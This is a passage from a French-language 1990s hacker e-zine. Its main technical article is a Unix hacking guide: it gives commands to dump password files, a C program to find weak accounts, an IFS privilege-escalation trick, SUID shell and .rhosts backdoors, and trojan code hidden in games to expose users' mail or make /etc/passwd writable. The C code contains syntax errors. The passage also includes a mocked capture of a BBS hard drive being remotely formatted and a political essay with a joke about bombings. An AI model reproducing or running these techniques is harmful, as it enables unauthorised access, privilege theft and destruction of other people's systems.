ces appareils taient
dj
accros, certes, mais la rumeur sur les performances de ces
engins se rpandant, plusieurs laisss pour compte se
dbrouillrent pour obtenir une place dans les programmes de "temps
partag". D'autres hackaient ces systmes pour avoir des niveaux
d'accs de plus en plus levs leur permettant de pousser plus
loin, toujours plus loin, leurs incursions dans les systmes
informatiques. Mais je m'emporte, et tout cela n'est PAS au Muse
de la Civilisation. En effet, ce n'est pas une chronologie du
cyberspace qu'on y trouve, mais de l'ordinateur. Nuance! Ainsi,
vous ne verrez pas de tableau du genre (authentique, en passant):
1876 - Alexandre Graham Bell invente le tlphone
1878 - Les premiers adolescents a abuser du systme tlphonique se
font virer de leur job!
1971 - Les Yippies publient le premier numro du magazine YIPL\TAP
1982 - William Gibson publie sa premire nouvelle "cyberpunk"
1984 - Fondation du groupe "Legion of Doom" (LoD)
1984 - Le magazine 2600 parait pour la premire fois
1992 - Naissance de Northern Phun Co.
It's a shame, though! Alors, avis aux amis de NPC qui
travaillent au Muse de la Civilisation et qui m'ont invit
la
premire de l'expo, sachant que a m'allumerait: on veut une expo
sur les hackers!
Allez y jeter un coup d'oeil, a vaut la peine!
-------------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
-------------------------------------------------------------------
Pas une introduction a Unix, un guide de hacking
par
Gurney Halleck
Etant une des personnes qui se plaignaient du manque
d'articles de niveau technique dans NPC depuis un certain temps,
j'ai dcid de faire ma part. Le fait que j'aie rencontr Kermit
(un gars qui sait vraiment de quoi il parle) m'a redonn confiance
dans NPC. Alors voici:
Je ne parlerai pas de comptes default, ces informations ont
dj
t publies auparavant, et ce dans plusieurs magazines
online. Je prendrai pour acquis que vous avez dj
accs au shell
sur un system Unix. Quel est la premire chose
faire lorsque vous
entrez sur un systme pour la premire fois? Faites un 'who' pour
voir qui est sur le systme: si vous voyez "root" ou d'autres
comptes gnralement rservs aux sysadmins, dconnectez-vous et
essayez plus tard! Si le chemin est libre lors d'une nouvelle
tentative, ouvrez vos buffers et faites 'cat /etc/passwd' ('nidump
passwd /' sur un systme avec NetInfo ou 'cat /etc/passwd; ypcat
passwd' sur un systme avec NIS). Vous verrez alors dfiler la
password file sur votre cran, et elle sera subsquemment capture
dans votre buffer.
[Note en passant, pour les usagers plus avancs: sur SunOS avec
shadow, changer la source du passwd map dans /var/yp/Makefile de
/dev/nul
/etc/passwd. C'est trs amusant. Les sysadmins
apprcient beaucoup]
Voyons un peu ce que contient ce fichier:
root:fi3Sed86itqR5:0:1:/:/bin/sh
deamon:*:1:1::/tmp:
nuucp:QWRoNM8fYbVnE:10:4:UUCP
login:/usr/spool/uucppublic:/usr/lib/uucp/uucico
ghalleck:f8fk3j1OIf34.:100:100:Gurney Halleck:/u/ghalleck:/bin/sh
...etc
Remarquez bien le compte deamon: il est impossible de se logger sur
ce compte. Mme si a l'tait, ce compte ne possde pas de shell,
donc il ne vous serait pas d'une grande utilit. Regardez
maintenant le compte NUUCP: si vous avez un systme UUCP pour DOS
la maison et que vous trouvez le mot de passe, vous pouvez vous
logger sur ce compte en vous faisant passer pour un autre systme.
Ceci peut tre utile pour injecter de la mail dans un systme,
intercepter de la mail sur un autre, ou encore pour transfrer des
fichiers sur votre machine ou vers le systme que vous tentez de
hacker. Voici un example concret:
[Sur tout les systmes Unix (non-internet) dans la rgion de
Sherbrooke, spoofer un systme appel SISCA sur le compte nuucp
(sans password) vous permet de transfrer la password file du
systme que vous tentez de hacker chez vous. Il ne vous reste
ensuite qu'
cracker la password file avec jack/hades/kc...]
Regardez maintenant le compte root (root est le username), le
paquet de caractres bizarres, a c'est le mot de passe (il est
encrypt bien sr), le 0 c'est le numro d'identification de
l'usager (UID), le 1 c'est le numro d'identification du groupe
d'usagers (GID), le prochain champ contient le nom au complet de
l'usager (GCOS), le / est le directory par dfaut de root et,
finalement, le /bin/sh est le shell de root.
Comment les passwords sont-ils encrypts? La fonction
crypt(3) de Unix prend le password de l'usager et s'en sert comme
cl d'encryption pour encrypter un block de zros de 64 bits. Le
bloc de 64 bits rsultant est encrypt de nouveau, et ce 25 fois.
A ceci est ajout un peu de sel :-) , le SALT en ralit. C'est un
nombre de 12 bits qui change un peu le rsultat du DES. Le password
final est ensuite transform en une chane de 11 caractres ASCII,
chane affichable et store dans le fichier /etc/passwd.
Regardez bien ceci: (example de salt)
PASSWD SALT Passwd encrypted
norahs am amfIADTsiqjAf
norahs 7a 7azfT5tIdyh0I
Bon, maintenant, on va essayer de trouver d'autres comptes.
La premire chose
faire est de chercher des JOE accounts (comptes
comme login:joe Password:joe). Voici un petit programme qui se fera
un plaisir de trouver ces comptes:
--------------------------couper ici----------------------------
/*
* joetest.c
*
* Scanne tout les comptes pour trouver des "joe account"
*/
#include <stdio.h>
#include <pwd.h>
int main(argc,argv)
int argc;
char **argv;
{
struct passwd *pw;
while(pw=getpwent((){
char *crypt();
char *result;
if(pw->pw_passwd[0]=0{
printf("%s has no password\n",pw->pw_name);
continue;
}
result =crypt(pw->pw_name,pw->pw_passwd);
if(!strcmp(result,pw->pwpasswd)){
printf(%s is a joe\n,pw->pw_name);
}
}
}
-------------------------couper ici-------------------------------
Bon, maintenant qu'on a crack quelques passwords et qu'on
a trouv des Joe accounts, on fait quoi? Fouillez bien les fichiers
dans les directories des comptes que vous avez crack. Maintenant
on examine nos permissions. Vrifiez le fichier /etc/groups pour
voir
quel autre groupe vous appartenez. Normalement le groupe
wheel a beaucoup d'accs, et ses usagers peuvent accomplir
certaines tches de sysadmin. Donc un compte qui appartient au
groupe wheel est TRES intressant.
Il faut maintenant dcider quel account on va utiliser. Un
account qui ne sert pas souvent est le meilleur choix. Le programme
qui suit trouvera les comptes qui n'ont pas servi depuis 1 mois.
-------------------------couper ici-------------------------------
#!/bin/sh
# liste des account qui n'ont pas servi depuis un mois.
#
THIS_MONTH=`date | awk'{print $2}'`
last | grep $THIS_MONTH | awk '{print $1}' | sort -u >
/tmp/users1$$
cat /etc/passwd | awk -F: '{print $1}' | sort -u > /tmp/users2$$
comm -13 /tmp/users[12]$$
/bin/rm -f /tmp/users[12]$$
------------------------couper ici---------------------------------
Vous avez maintenant un choix d'accounts
utiliser. Avec de
la chance, vous aurez au moins un acompte avec plusieurs privilges
parmi les accounts que vous venez de cracker.
I love COPS
Le programme COPS, votre ami. Le programme COPS vrifie les
permissions du systme en entier et trouve tous (ou presque tous)
les trous dans la scurit. Il est disponible sur plusieurs sites
FTP (ex:nemesis.cti.ulaval.ca). Compilez-le sur la machine que vous
tentez de hacker, il produira un rapport sur la scurit du
systme. Lorsque vous connatrez les faiblesses de votre hte, il
vous sera facile de les exploiter. Explication des permissions:
-rwxrwxrwx
| | | |
| | | permission world
| | |
| | permisson group
| |
| permission owner
|
|
type de fichier (d=directory l=link -=fichier)
Pour changer les permissions, servez vous de la commande
'chmod'. Voici la liste des options de permissions avec leurs
nombres octals:
Nombre Permission
octal
4000 SUID (set user ID a l'execution du fichier)
2000 GUID (set group ID a l'execution du fichier)
1000 "Sticky bit"
0400 Lecture par owner
0200 Ecriture par owner
0100 Excution par owner
0040 Lecture par group
0020 Ecriture par group
0010 Excution par group
0004 Lecture par world
0002 Ecriture par world
0001 Excution par world
Je SUID un bon GUID, dans le fond...
Qu'est-ce que SUID, GUID etc.? Laissez-moi vous donner un
exemple concret: j'ai dj
trouv sur l'internet un systme Ultrix
qui runnait ELM SUID root! ELM est un Mail User Agent (interface
pour la mail) qui permet de dropper au shell mail. Vu que le prog
runnait SUID root, le shell tait un shell root! Voyez-vous, ELM
n'est pas fait pour runner SUID. Il n'aime pas a! C'est pourquoi,
en dsespoir de cause, il nous offre autant d'accs que si nous
avions le mot de passe de root. ELM se venge bien de son matre,
tiens! GUID obit au mme principe, mais pour l'access group.
Sticky bit, car je ne connais pas vraiment
fond ce domaine. Je
peux tout de mme vous dire certaines choses. Exemple concret pour
hacker un prog SUID root qui n'aurait pas d l'tre: le programme
'/usr/lib/preserve'.
Ce programme prservait un fichier qui tait dit quand
l'usager quittait brusquement l'diteur (vi), et envoyait un mail
l'usager pour l'avertir qu'il pouvait rcuperer son fichier
sauv. BUG: le programme runnait SUID root et donnait l'instruction
suivante: bin/mail. Que faire avec a? Il y a une variable
d'environnement appele IFS qui dit au shell ce qu'il doit
considrer comme un espace dans une commande (ex: cp test
/bin/test). Ainsi, une personne n'avait qu'
changer IFS=/, et
alors le prog donnait l'instruction bin avec l'argument mail. Donc,
la personne crait dans son directory un fichier bin qui donnait
des instructions pour modifier le systme car le programme runnait
SUID root!
Exemple de bin:
------------------------COUPER ICI------------------------------
# program qui cre un trou dans la scurit assez grand pour
# laisser passer un 747!
chown root sh
chmod 4777 sh
------------------------COUPER ICI---------------------------------
Avertissement: ce bug est trs vieux et vous ne le
rencontrerez (malheureusement) pas souvent!
---
Comment trouver ces sympatiques programmes? COPS se fera un
plaisir de les trouver pour vous, mais si vous desirez le faire
vous-mmes, voici une commande pratique:
'find / -perm -0040000 -o - perm -002000 \) -type -print'.
Ceci vous donnera un listing de tous les progs qui runnent
SUID ou GUID.
Comment compromettre la scurit d'un systme? Disons qu'un
ami vous prte son compte pour 10 minutes et va ensuite changer son
mot de passe pour vous empcher d'utiliser son compte dans le
futur: comment empcher cette injustice? ;-)
2 commandes! Tapez 'cp /bin/sh /temp/.break' <return> 'chmod
4777 /temp/.break' <return>. Ensuite, loggez-vous avec votre mot de
passe et tapez /temp/.break et voil
: vous tes devenu une autre
personne! Un autre exemple: disons que COPS a dcouvert un fichier
.login qui permet l'criture, que faire avec? Ce fichier s'excute
lorsque vous vous loggez pour setter des variables d'environnement,
etc. Il runne sous le UID de la personne qui se logge, donc vous
pourriez lui faire des modifications dans ses fichiers. Un fichier
intressant
changer: '.rhosts' '.dbxinit' et '.exinit'. Exemple
concret: rajoutez une ligne ou deux dans son fichier .login, ce qui
pourrait crer une trap door, comme celle qui est dcrite ci-dessus
(pas trs discret). Ou, mieux encore, faites les changements
suivants dans son fichier .login:
--------------------couper ici-------------------------------
echo "localhost.random.edu badguy" >> ~/.rhosts
chmod 600 ~/.rhosts
--------------------couper ici-----------------------------------
Cela va vous permettre de faire rlogin de votre compte
(badguy@localhost.random.edu)
celui-ci sans avoir le mot de
passe. C'est relativement discret.
Maintenant, des trojans pour obtenir plus de privilges.
Disons que vous voulez lire le courrier de diffrentes personnes:
comment faire? Ma suggestion est de trouver des sources de jeux sur
internet et faire quelques petites modifications. Ex: pour lire le
courrier des autres usagers, rajoutez ceci dans des sources d'un
jeu potentiellement interessant:
------------------------couper ici---------------------------------
# include <pwd.h>
struct passwd *getpwnam(name);
struct passwd *p;
char buf[255];
main()
{
p = getpwnam(getlogin());
sprintf(buf,"%s/%s",p->pw_dir,"mbox");
if ( access(buf,0) > -1 ) {
sprintf(buf,"chmod 777 %s/%s",p->pw_dir,"mbox");
system(buf);
}
}
----------------------couper ici---------------------------------
Maintenant, annoncez
tout le monde l'existence du jeu et
laissez-les jouer avec. Aprs vous pourrez lire le contenu de leur
'mbox'. Pour attaquer le superuser seulement, crer un prog bidon
avec un nom trs vocateur (c'est trs bon sur des systmes avec
des admins trs anals
propos de la scurit de leur systmes et
qui fouillent partout -comme Mazu et Bussires sur dmi.usherb.ca)-
au lieu de rendre leur systmes scures) comme Crack ou Trojan ou
Worm, avec les permissions 700, et qui ne fait que dire: "root,
mme si vous avez fait su (account que vous utilisez) vous n'avez
pas la permission d'excuter ce programme". Ceci devrait l'obliger
le runner en tant que root. Ajoutez cette ligne
votre
programme:
-------------------------couper ici--------------------------------
if ( !strcmp(getlogin(),"root") ) system("chmod 666 /etc/passwd");
---------------------------couper ici------------------------------
Ca devrait vous permettre d'augmenter vos privilges comme bon
vous semble.
-------
Bon, c'est tout pour ce mois-ci, j'ai tout donn de
moi-mme dans ce texte. Peut-tre que Kermit ou SubHuman auraient
quelque chose
ajouter au prochain numro?
-------------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
-------------------------------------------------------------------
VOTER OU NE PAS VOTER,
TELLE EST LA QUESTION.
par Blitzkreig
Fin octobre, on va vous demander, si vous avez l'ge, d'aller
faire un petit "X" sur un bout de papier. Ca s'appelle, y parait,
de la dmocratie. C'est en gros la seule fois, en quatre ans, o on
vous demande votre avis. On vous demande votre avis, mais on ne
l'coutera pas. C'est la loi des nombres qui s'applique ici: si ton
X fait partie du gros du vote, t'as gagn, sinon...
Le X de la dmocratie... Si vous voulez mon avis, la
dmocratie est sur-value, et de beaucoup.
C'est quoi pour vous, la dmocratie,
part cette histoire de
X? Le droit
la libre expression? Ne me faites pas rigoler!
Libelle diffamatoire, littrature haineuse, ordonnance de non-
publication: les lois qui "modrent" la libre expression publique
sont nombreuses.
C'est quoi pour vous, la dmocratie? Le droit de se runir?
Organise une manif sans permis, organise un rave sans licence,
ramasse-toi avec tes copains
2 heures du matin en haut de la
porte St-Jean: ton droit de se runir n'en mnera pas gros devant
une matraque.
Je veux pas vous conter des peurs, les kids, mais la
dmocratie ne se rsume en gros qu'au petit X que tu mets sur ton
bulletin, une fois par mandat.
Et encore, ton X n'est pas toujours garanti. Ainsi, la Cour
suprme vient de rendre jugement dans une action de groupe dpose
au nom de milliers de nouveaux rsidents du Qubec qui n'eurent pas
le droit de voter au rfrendum d'octobre dernier. En gros, le
jugement dit que la Charte garantit le droit de voter aux
lections, mais pas aux rfrendums.
Les observateurs avertis, comme Marcel Adam de La Presse (voir
son ditorial du 11 septembre, dans la section NEWS), constatent
que, depuis cinq ou six ans, la Cour suprme donne plus souvent
raison au gouvernements qu'aux citoyens qui poursuivent en se
prvalant de la Charte. C'est le rsultat de toutes ces annes de
nominations POLITIQUES sur les rangs de la Cour suprme. Le
gouvernement a effectivement achet ses juges.
Et vous, pauvres nouilles, qui pensiez que le droit de vote
tait sacr en dmocratie...
En gros, la Charte des droits et liberts te dit que tu as le
droit
la dmocratie seulement quand on veut bien te le donner.
C'est, en gros toujours,
peu prs ce que vaut ton X. En gros,
c'est un peu gros... Et en gros, on en mne pas large en
dmocratie.
----------
Voter ou ne pas voter? Je peux te donner dix mille raisons
pour ne pas aller voter. Tu n'iras peut-tre pas voter parce que tu
ne veux pas tre complice de cette farce qui est de choisir entre
un pourri, un voleur et un bandit. Tu n'iras pas voter parce que la
politique te dbecte, tellement les crtins qui nous gouvernent
nous ont coeur avec leurs magouilles. Tu n'iras pas voter dans
l'espoir que, peut-tre, si le taux d'abstention dpasse le taux de
votants, la machine politique n'aura d'autre choix que de se
transformer: si le seul vrai droit dmocratique n'est mme plus
utilis, comment donner encore l'illusion de la dmocratie? Tu
n'iras pas voter parce que le Parti Rhinocros ne prsente pas de
candidats cette anne...
Mais moi, tu vois, je vais aller voter. Pas parce que je suis
plus fin ou plus idiot que les autres, pas parce que je crois
encore, d'une fois inbralable, dans la dmocratie, mais parce que
j'aurais de la misre
me regarder dans le miroir. C'est tout
fait personnel, remarque. Mais j'aurais une mauvaise sensation dans
mes tripes le soir des lections si je voyais un con arriver au
pouvoir en sachant que je n'avais pas fait tout ce qui est possible
pour l'en en empcher. Remarque, j'ai quand mme des hauts-le-coeur
le soir des lections, parce que le crtin passe anyway. J'ai le
don de voter pour les perdants, il me semble... Mais au moins,
cette sensation-l
fait UN PETIT PEU MOINS mal que l'autre.
La fois o j'ai gagn une lection... Mes X ont toujours t
des coups dans l'eau, depuis que j'ai l'ge de voter. La seule fois
o j'ai gagn (et gagn comme il faut), c'est quand j'ai vot pour
Rjean Lemoyne, alors candidat du R.P., comme chevin de St-Roch,
et que le Rassemblement Populaire a dtrn le Progrs Civique.
Remarque, la douleur est quand mme revenue, quand Rjean a t
criss
la porte du parti, quelques mois plus tard, pour honntet
intellectuelle et probit ne seyant pas
un homme politique... Au
moins, cette anne, avec Rjean comme indpendant, je ne peux pas
perdre mes lections: si Rjean rentre, il ne peut plus tre criss
la porte d'un parti parce qu'il est trop intgre...
Mais, cette histoire de X ou de ne pas "ixer", c'est tout
fait personnel, hein. Quelque part, en mon for intrieur, je vais
me sentir lgitim lorsque j'irai poser des bombes: "J'ai d'abord
vot et a n'a pas march, M. le juge. je n'avais donc pas d'autre
choix!"...
POUR QUI VOTER? OH! DILEMME CRUEL!
A supposer que, lors des prochaines lections fdrales, vous
alliez mettre un X dans un des petits carreaux, pour qui allez-vous
voter? Encore un choix personnel, certes, surtout sachant QU'AUCUN
des partis en lice n'a de solution
nous proposer, et qu'au mieux,
on peut juste esprer mettre un Band-Aid sur l'hmorragie. Vous
allez quand mme pas voter pour les conservateurs, non? Kim n'est
qu'une Mulroney en jupons, qui se contredit et nous ment
longueur
de journe; vous n'aller quand mme pas lui donner un mandat pour
quelle termine ce que les conservateurs ont commenc?
Et qu'est-ce que c'est,
votre avis? Je n'ai que l'embarras
du choix devant leurs conneries: dpenser des MILLIARDS de dollars
pour des hlicoptres conus pour la chasse aux sous-marins russes,
alors que les russes n'ont mme plus de flotte, alors que le
gouvernement n'a mme pas d'argent pour offrir des cours de
formation professionnelle aux chmeurs. C'tait l'exemple numro
un. Mais j'arrte ici l'numration: vous connaissez probablement
tous les actes destroy des bleus. Un commentaire, cependant: vous
avez tous vu, aux nouvelles, cette ontarienne qui vient de quitter
une job de plus de quarante mille dollars par anne, pour se
ramasser sur le b.s. Les mes bien pensantes crient au scandale.
Moi, au contraire, je la trouve courageuse. Elle a dmontr, avec
chiffres
l'appui, que la diffrence entre ce qu'une mre
monoparentale bien paye touche et ce que cette mme mre recevrait
sur le b.s. n'est que d'une ou deux centaines de dollars. Qu'est-ce
que a veut dire, selon vous? Que le b.s. est trop cher, dites-
vous? Non! Ca veut dire que, entre la classe moyenne et la classe
pauvre, il n'y a quasiment plus de diffrence. Les libraux et les
conservateurs ont, en l'espace de quelques annes, russi
faire
disparatre la classe moyenne, telle que les conomistes
l'entendaient. Il n'y a vritablement plus que les pauvres et les
riches, plus de milieu. Merci PET! Merci Bryan!
Pour qui allez-vous voter? Jean Chrtien? N'oublions pas que
le marasme conomique dans lequel nous ont conduit les
conservateurs avait t initi par les rouges? A eux aussi, vous
voulez leur donner la chance de finir la job?
Le bloc qubcois... Le Bloc est le vrai band-AId,
mon avis.
Pas une solution, non: juste un baume sur nos blessures. Un: le
Bloc n'a aucune ambition de pouvoir. La rigueur mathmatique la
plus lmentaire l'exclut. Les dputs du Bloc n'ont aucune
ambition d'tre ministrs. La logique du pouvoir la plus
lmentaire l'exclut aussi. Le Bloc risque d'tre plus
"dmocratique" que n'importe quel autre parti, ne serait-ce que
parce que plusieurs dputs du bloc viennent, justement, des partis
traditionnels, d'o ils ont t crisss
la porte pour n'avoir pas
suivi la ligne du parti. Ca m'tonnerait beaucoup qu'ils
recommencent ce petit-jeu l
entre eux autres. Ca nous garantit
donc des libre-penseurs qui n'auront pas les mains lies et la
bouche cousue par les politicailleries les plus viles. Le Bloc n'a
qu'un objectif: faire passer les intrts du Qubec d'abord, et
fuck le reste du Canada!
C'est un bon programme pour moi, puisque je ne suis pas
fdraliste. Ainsi, si le prochain gouvernement, fort probablement
minoritaire, dcide de faire fabriquer 200,000 pdalos blinds pour
l'arme, le Bloc va s'opposer, au nom du peuple qubcois. Et si le
Bloc ne russit pas
empcher la fabrication des pdalos, ben il
va s'assurer que ces pdalos soient fabriqus au Qubec plutt
qu'en Alberta. Je sais, c'est pas trs gentil pour nos amis
canadiens que de tirer la couverte de notre bord, mais, comme
dirait l'autre, on ne fait pas de jobs sans casser des oeufs.
Et c'est des jobs dont le Qubec a besoin, pas d'unit pan-
canadienne. Une fois que tu as dfini tes priorits, tous les
moyens sont bons pour arriver
tes fins... Mais c'est ma politique
moi, hein, vous tes pas obligs de fonctionner de mme.
Le fait est que si le Bloc obtient 25 siges, ils devront tre
automatiquement invits
siger sur toutes les commissions. Avec
50 siges (ce que j'espre), ils reprsentent, dans un gouvernement
minoritaire, la balance du pouvoir, et a commence
tre pas mal
intressant.
Vivement l'indpendance, tiens (mais ceci est une autre
histoire)...
Anyway, quoi que vous fassiez, loafer votre vote ou voter BQ,
faites-le comme il faut! Et faites la sourde oreille au chant des
sirnes!
-------------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
-------------------------------------------------------------------
JE CROYAIS QUE L'IMBCILIT AVAIT SES LIMITES...
JE NE LE CROIS PLUS...
Par
Atreid Bvatron
Un de nos... admirateurs nous a fait parvenir une superbe
pice de muse... Probablement expos au muse des horreurs, ce
petit capture de destruction de bbs est tout simplement
tordant... Non, ce n'est pas le fait qu'il ait crash un bbs si
facilement qui est tordant, c'est le fait que celui qui l'a fait
est d'une NULLIT DCONCERTANTE!!! Surtout, n'oubliez pas
d'essayer CRASHING.EXE, dans l'archive qu'il nous a fait
parvenir! Il s'agit, en fait, d'un capture anim de ces
lucubrations ridicules.
Non seulement il nous a fait parvenir ces MERDES, mais, en
plus, il en est FIER! Ah! O va le monde me direz-vous? Je n'en
sais rien, mais je me rjouis seulement qu'il ne soit pas trop
peupl de CONS pareils. J'espre que tu lis bien ce que je te
dis, parce je veux que tu me comprennes. Nous, de NPC (et toute
personne munie d'un QI plus haut que 60), mprisons avec
vhmence tout comportement de destruction de base de donnes sur
un systme informatique, que ce soit un bbs ou un systme UNIX,
que le systme soit mauvais ou non. OU, si tu veux dtruire,
prends une massue et pioche un peu sur ton modem, a rendra
service
ben du monde... Ou, du moins, continue de dtruire des
bbs, mais n'emmerde pas le monde avec tes conneries.
a ne vous rappelle pas tous quelqu'un? Moi, il me fait
penser
cet imbcile de Testament Collector. Non que ce soit
lui, parce que ce n'est pas lui. Celui-l
, il est de la
mtropole! Celui-l
, il est de la grande ville de Montral. Ah!
Je te mprise, sache-le et souviens-t'en.
Enfin, trve de vaines paroles pour ce cas dsespr, et
voici le capture en question. Allez aussi runner CRASHING.EXE,
qui n'est qu'une autre preuve de plus de sa profonde faiblesse
intellectuelle... M'enfin!
P.S: Je n'ai pas pris la peine de perdre mon temps
arranger les
ascii...
---------------
@@@@ Salut tout le monde !!!
Si vous faites un peu de modem, vous allez surement
reconnaitre de quel bab viennent ces ansis (ascii...). Bin, c'est
tout simplement ca qui reste de ce bbs...
Ayez la patience de lire ca au complet, ca vaux la peine !!!
@@@@
ÜÛÛÛÛÛÛÜ ÜÛÛÛÛÛÛ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÛ
ÛÛ ÛÛ ÛÛ ÛÛÜÜÜÜ ÛÛÜÜÜÜ ÛÛÜÜÜÜ ÛÛÜÜÜÛÛ ÛÛ ÜÜÜ ÛÛÜÜÜÜ
ÛÛ ÛÛ ÛÛ ÛÛßßßß ßßßßÛÛ ßßßßÛÛ ÛÛßßßÛÛ ÛÛ ÛÛ ÛÛßßßß
ÛÛ ÛÛ ÛÛ ßÛÛÛÛÛÛ ßÛÛÛÛÛß ßÛÛÛÛÛß ÛÛ ÛÛ ßÛÛÛÛÛß ßÛÛÛÛÛÛ
Section: Crusing
@@@@ (bin oui, une section de putes..) @@@@
> Avant
L Lire < Arrire
E crire ! Logoff
S Scaner ? Chater le Sysop
Q Quick-scan les message - Menu Prcdent
M Mode combin
C Changer de section
Lets go ecriver des messages en masse pis replayer aux messages
qui sont
ALL.
@@@@ Ca, j'aime ca, les messages a ALL... (hein??) @@@@
Temps (1439) Votre Choix:-) -
ÖÄÒÄ¿ ÖÄÄ¿ ÒÄÄ¿
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°°ÛÛ
º º ³ éÄÄÙ
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°ÛÛÛÛ
Ð ÓÄÄÙ Ð
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°ÛÛÛÛÛÛÛÛÛ
ÖÄÒÄ¿ ÒÄÄ¿ ÖÄÄ¿ Ò Â
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°ÛÛÛ°°ÛÛ°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
º º ³ éÄ º ³ º ³ °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
@@@@ Bah... C'est pas au complet, parce que le temps, c'est
primordial. @@@@
PassWord: þþþþþþþþþþþþ
@@@@L'histoire du password est tres longue... Ca ete ruff mais on
l'a eu.@@@@
W: Dorway
@@@@ C'est ca que nous cherchions... @@@@
D: Sysop Download
R: Dos directory
-: Menu prcdent
M: Mouve un fichier
S: Effacer un message
C: Changer bbs liste
E: Enlever bbs liste
L: Liste longue de bbs
B: Liste courte de bbs
F: Dowloader la liste de bbs
A: A W
Wow Pte Pas Le Feu Je Load !!
@@@@Tres bonne string mais c'est plutot le SO qui va peter le feu
en voyant ca ! @@@@
DOORWAY to unlimited doors V 3.0á - Copyright (C) 1988, 89 by
Marshall Dudley
Registered to: One H00py Freud - DrZaphod
Your time available in door is 400 Minutes
Microsoft(R) MS-DOS(R) Version 6
(C)Copyright Microsoft Corp 1981-1993.
C:\SBBS\DOORWAY>format c: /q
@@@@ He He... La ca viens amusant... @@@@
ATTENTION : TOUTES LES DONNEES DU DISQUE DUR C: SERONT PERDUES!
@@@@ Je m'en contre fiche... @@@@
Lancer le formatage (O/N) ? o
@@@@ Bin Ouais... C'est ca que j'attendais !!! @@@@
Vrification du format du disque.
Enregistrement de l'information pour UNFORMAT.
Formatage rapide en cours 42.45Mo
@@@@Bof, y'orait tu pus se forcer pour un HD plus gros ??? @@@@
Formatage termin
@@@@ C'est gagne les mecs ! @@@@
Nom de volume (11 caractres ; si aucun : appuyez sur ENTREE) ?
@@@@Bah... cette fois ci on a oublie notre carte de visite...
@@@@
44406784 octets d'espace disque
44406784 octets disponibles sur disque
2048 octets dans chaque unit d'allocation.
21683 units d'allocation disponibles sur disque.
Le numro de srie du volume est 0A4B-16CD
@@@@ Comme ca, tu te le fera pas piquer ??? @@@@
C:\>dir
@@@@La, y faut verifier si la job est faite comme y faut. @@@@
Le volume dans le lecteur C n'a pas de nom
Le numro de srie du volume est 0A4B-16CD
Rpertoire de C:\
Fichier introuvable
@@@@ Ok, c'est correct... @@@@
@@@@Quand meme, pauvre SysOps pis Co-SO ! Des heures de travail a
l'eau. Pauvres putes aussi, ouais, celles qui s'attardaient a
ecrire des messages dans le Cruising. C'est vrai que c'etais
juste des ecris, pas des FAITS, ni des promesses. Juste des
agaces. Pis pauvres gars qui trippaient a l'idee qu'ils avaient
recu un message ou ca disait "Viens mon cheri, je reve de me
faire baiser par toi." Heille !!! Ca fait ca ! Partez-vous donc
un board, "The Cow-Girls BBS". T'se quand meme, j'payerais pas
cent douilles juste pour faire l'amour en CyberSpace !
Ya aussi un des SysOp qui voulaient que les petits cons
qui D/L des animations XXX qui en U/L aussi. Une grosse bete de
sexe c'te gars la! Quand a ca, qu'y aille se logger sur "The
Cow-Girls BBS" ! Ca l'air que c'est son genre.
Je ne sais pas si y'avais un Backup, si oui, j'sais pas
si y va avoir le courage de le repartir. T'se, s'acharner a ca
pis POUF !!! plus rien, niet, capout ! Pis avec un 45 Meg, y
devait pus y avoir de place la dessus. Bien la, y'en a en
masse!!!
Si pas de Backup, bin la faut recommencer a zero, ou tout
lacher... Ca prend du courage pis y faut taponner pas mal pour
pas se faire AVOIR !!! (Comme la, le SO avait pas pris de
precotions) T'as pris une chance d'installer DoorWay pis tu t'es
fait formatter ton HD ? Tres mauvais ca, j'espere que tu vas
retenir la lecon Hein ???
Le groupe de CyberThree vous dit a la prochaine !
Et ratez pas la prochaine aventure !
Wolf'n Dark
ReadyLark
of CyberThree
@@@@
---------------
Voil
! Wolf'n Dark of Cyberthree... Wow... Un handle et un nom de
groupe
son image, dcidment... Le pire, pensez-y un peu, c'est
qu'il ne fait mme pas sa job comme il faut! Souvenez-vous de ce
que vous pouvez faire comme commande du dos si vous voulez
dformater votre disque... La commande UNFORMAT et si vous tes
chanceux, vous pourrez retrouver la presque totalit de votre
disque. Ah! La prochaine fois, runne au moins un trojan! M'enfin!
--------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
--------------------------------------------------------------
-= Northern Phun Co. Et GAtES iNCoRPoRATED =-
-= Prsentent Avec Fiert: =-
LE GUIDE DE SURVIE DE l0gRuS!
(THE l0gRuS! SURVIVAL GUIDE)
SUJET DU MOIS: L'COLE
Intro:
~~~~~~
Commenons par dire que ce texte n'est pas un manuel
d'anarchie sans but, comme vous auriez dj
pu en lire des tonnes
(LoL3-4, etc, etc), mais bien un Manuel d'Anarchie Scolaire
Constructive. Eh oui, sans blagues!
Bon, alors commenons avec ce papier.
Pourquoi appliquer ce texte dans nos institutions?:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Commenons par admettre que si l'cole tait si mauvaise
que cela, a ferait longtemps qu'elle serait limine. Si vous
avez a en tte, a vous vitera pas mal de gaffes. Appliquer
l'anarchie de manire stupide ne mnerait
rien. Voici les buts
de l'Anarchiste Scolaire:
1) veiller la conscience d'autres personnes, qui deviendront
leur tour de futurs Anarchistes Scolaires, et qui pourront
ventuellement a) vous aider dans votre tche ou b) continuer
